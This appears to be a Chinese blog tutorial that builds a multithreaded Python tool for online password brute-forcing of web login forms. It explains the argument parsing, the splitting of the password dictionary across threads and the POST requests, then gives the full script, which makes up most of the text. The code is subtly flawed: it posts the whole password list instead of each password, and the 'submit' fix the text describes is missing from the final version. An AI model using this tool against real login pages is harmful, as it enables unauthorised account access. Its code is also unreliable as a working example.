目录
前言
初学者者工具编写!
仅用学习使用,不做其他任何用途!
效果展示:
?
一、在线密码破解介绍
1.什么是在线密码破解
1)针对在线服务的认证凭证进行合法用户枚举
2)离线破解(拿到密文进行解密(如:md5))
2.web安全中用来破解的工具burpsuite
1)基于表单验证的破解
2)基于HTTP认证的破解
3.导入需要用到的python模块
import optparse,threading,math,requests二、命令行模块介绍
1.optparse模块介绍
????????1)导入optparse
????????2)初始化optparse.OptionParse
????????3)设置初始对象的usage属性
????????4)添加参数:parse.add_option('-u','--user_file',dest='username_file',help='read username from file',metavar='FILE',action='store',type='string')
????????5)存储提交的命令行参数:(options,args)=parse.parse_args()
????????6)测试输出:print(options.username_file)
parser = optparse.OptionParser()
parser.usage = '在线密码破解.py -s url -u user_file -p pass_file -t num'
parser.add_option("-s","--site",help="website to test",action="store",type="string",metavar="url",dest="site")
parser.add_option("-u","--userfile",help="read username from file",action="store",type="string",metavar="FILE",dest="userfile")
parser.add_option("-p","--passfile",help="read pass from file",action="store",type="string",metavar="FILE",dest="passfile")
parser.add_option("-t","--threads",help="number of threads",action="store",type="string",metavar="THREADS",dest="threads")
(options,args) = parser.parse_args()
# print(options.site)
# print(options.usernamefile)
# print(options.passfile)
# print(options.threadsfile)
# payload确定
ths = options.threads
# print(ths)
# print(type(ths))
pass_dic = options.passfile
# print(pass_dic)
user_dic = options.userfile
# print(user_dic)
site = options.site
# print(site)2.web密码破解命令行读取模板编写
????????1)需读取用户名
????????2)需读取用户密码
????????3)需读取url
????????4)需读取线程数
三、payload确定
1.思路
????????用户名循环读取,密码根据线程数均分,用户名与密码组合,使用多线程扫描探测;
# 新建一个密码字典列表 [[],[],[],[]]
pass_list = []
result_num = 0
temp_thread_list = []
# 根据线程数,确定每一个项当中内容的行数
# 1)读取所有密码字典中的内容到要给的列表中,确定字典的行数
with open(pass_dic,'r') as f:
temp_list = f.readlines()
num = len(temp_list)
# print(temp_list)
# print(num) # 202.密码字典列表确定
????????根据线程数确定;
# 使用得到的临时列表的项数 除以 线程数 来确定每一个线程中的项数(向上取整)
result = math.ceil(int(num)/int(ths))
# print(result) # 2
result_num=result
flag = 0
for line in temp_list:
flag += 1
temp_thread_list.append(line.strip())
if flag == result:
flag = 0
pass_list.append(temp_thread_list)
temp_thread_list = []
# print(pass_list)
# print(type(pass_list))四、多线程访问
1、python中的多线程
????????import threading
????????threading.Thread(target=(函数名),args=参数)
????????开启线程 start()
2、工具中使用多线程列表
# payload -> pass_list 结合 用户名字典进行确定
# 使用线程列表
ths_list = []
with open(user_dic,'r') as f:
user_list = f.readlines()
for user in user_list:
for pass_line in pass_list:
payload = {'user':user.strip(),'pass':pass_line}
# print(payload)
ths_list.append(threading.Thread(target=scan,args=(payload,)))
for th in ths_list:
th.start()五、功能模块编写
1.思路
????????根据返回的内容不同
????????根据返回的长度
2.python第三方库requests
????????import requests
????????r = requests.post(url,data)
????????len(r.text)
def scan(payload):
# print(payload)
user = payload['user']
pass_list = payload['pass']
useragent = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36'}
for password in pass_list:
r = requests.post(url=site,data={'username':user,'password':pass_list},headers=useragent)
print('URL:'+site+': ''username:'+user+' '+'password:'+password+' '+'lenght:'+str(len(r.text))+' '+str(r.status_code))
# print(r.request.headers)六、功能测试 Bug修改
1、问题发现
????????很多时候直接破解其实是没有去尝试登陆的,返回长度不管正确与否都是一样的,可查看源代码或者审查元素,提交的参数中除了admin和password,还有submit。
2、Bug修改
????????所以在date后还要将submit加进去
完整代码如下:
# coding=utf8
# @time:2022/5/9 15:04
# Author 浩宇
# 完整代码展示
import optparse,threading,math,requests
parser = optparse.OptionParser()
parser.usage = '在线密码破解.py -s url -u user_file -p pass_file -t num'
parser.add_option("-s","--site",help="website to test",action="store",type="string",metavar="url",dest="site")
parser.add_option("-u","--userfile",help="read username from file",action="store",type="string",metavar="FILE",dest="userfile")
parser.add_option("-p","--passfile",help="read pass from file",action="store",type="string",metavar="FILE",dest="passfile")
parser.add_option("-t","--threads",help="number of threads",action="store",type="string",metavar="THREADS",dest="threads")
(options,args) = parser.parse_args()
# print(options.site)
# print(options.usernamefile)
# print(options.passfile)
# print(options.threadsfile)
# payload确定
ths = options.threads
# print(ths)
# print(type(ths))
pass_dic = options.passfile
# print(pass_dic)
user_dic = options.userfile
# print(user_dic)
site = options.site
# print(site)
# 新建一个密码字典列表 [[],[],[],[]]
pass_list = []
result_num = 0
temp_thread_list = []
# 根据线程数,确定每一个项当中内容的行数
# 1)读取所有密码字典中的内容到要给的列表中,确定字典的行数
with open(pass_dic,'r') as f:
temp_list = f.readlines()
num = len(temp_list)
# print(temp_list)
# print(num) # 20
# 2)使用得到的临时列表的项数 除以 线程数 来确定每一个线程中的项数(向上取整)
result = math.ceil(int(num)/int(ths))
# print(result) # 2
result_num=result
flag = 0
for line in temp_list:
flag += 1
temp_thread_list.append(line.strip())
if flag == result:
flag = 0
pass_list.append(temp_thread_list)
temp_thread_list = []
# print(pass_list)
# print(type(pass_list))
def scan(payload):
# print(payload)
user = payload['user']
pass_list = payload['pass']
useragent = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36'}
for password in pass_list:
r = requests.post(url=site,data={'username':user,'password':pass_list},headers=useragent)
print('URL:'+site+': ''username:'+user+' '+'password:'+password+' '+'lenght:'+str(len(r.text))+' '+str(r.status_code))
# print(r.request.headers)
# 3)payload -> pass_list 结合 用户名字典进行确定
# 使用线程列表
ths_list = []
with open(user_dic,'r') as f:
user_list = f.readlines()
for user in user_list:
for pass_line in pass_list:
payload = {'user':user.strip(),'pass':pass_line}
# print(payload)
ths_list.append(threading.Thread(target=scan,args=(payload,)))
for th in ths_list:
th.start()更多安全分享,请关注【安全info】微信公众号!
